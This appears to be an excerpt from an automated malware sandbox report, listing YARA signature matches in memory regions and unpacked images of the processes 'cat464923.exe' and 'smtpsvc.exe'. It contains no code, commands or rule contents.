Source: Yara match File source: 00000012.00000002.2220153845.0000000002351000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.2088546622.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.2168272542.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2209068863.00000000030A9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.2169977777.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2347409859.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2212832493.0000000003239000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2210122241.0000000003255000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: smtpsvc.exe PID: 2416, type: MEMORY
Source: Yara match File source: Process Memory Space: cat464923.exe PID: 2468, type: MEMORY
Source: Yara match File source: Process Memory Space: cat464923.exe PID: 2324, type: MEMORY
Source: Yara match File source: Process Memory Space: cat464923.exe PID: 2668, type: MEMORY
Source: Yara match File source: 17.0.smtpsvc.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.smtpsvc.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.smtpsvc.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.cat464923.exe.34e019c.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.cat464923.exe.4a0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.smtpsvc.exe.339b366.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.smtpsvc.exe.3444d80.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.cat464923.exe.34db366.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.cat464923.exe.32d019c.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.cat464923.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.cat464923.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.smtpsvc.exe.334b366.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.smtpsvc.exe.33a019c.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.cat464923.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.smtpsvc.exe.33547c5.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.cat464923.exe.34e47c5.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.0.cat464923.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.0.cat464923.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.smtpsvc.exe.3174d80.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.smtpsvc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.smtpsvc.exe.3444d80.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.smtpsvc.exe.335019c.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.cat464923.exe.32d019c.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.cat464923.exe.34a4d80.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.cat464923.exe.4a4629.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.smtpsvc.exe.335019c.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.smtpsvc.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.cat464923.exe.4a0000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.smtpsvc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.cat464923.exe.3304d80.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.cat464923.exe.34e019c.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.cat464923.exe.32cb366.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.cat464923.exe.32d47c5.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.cat464923.exe.34a4d80.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.cat464923.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.smtpsvc.exe.3174d80.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.smtpsvc.exe.33a47c5.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.smtpsvc.exe.33a019c.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.cat464923.exe.3304d80.6.raw.unpack, type: UNPACKEDPE
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs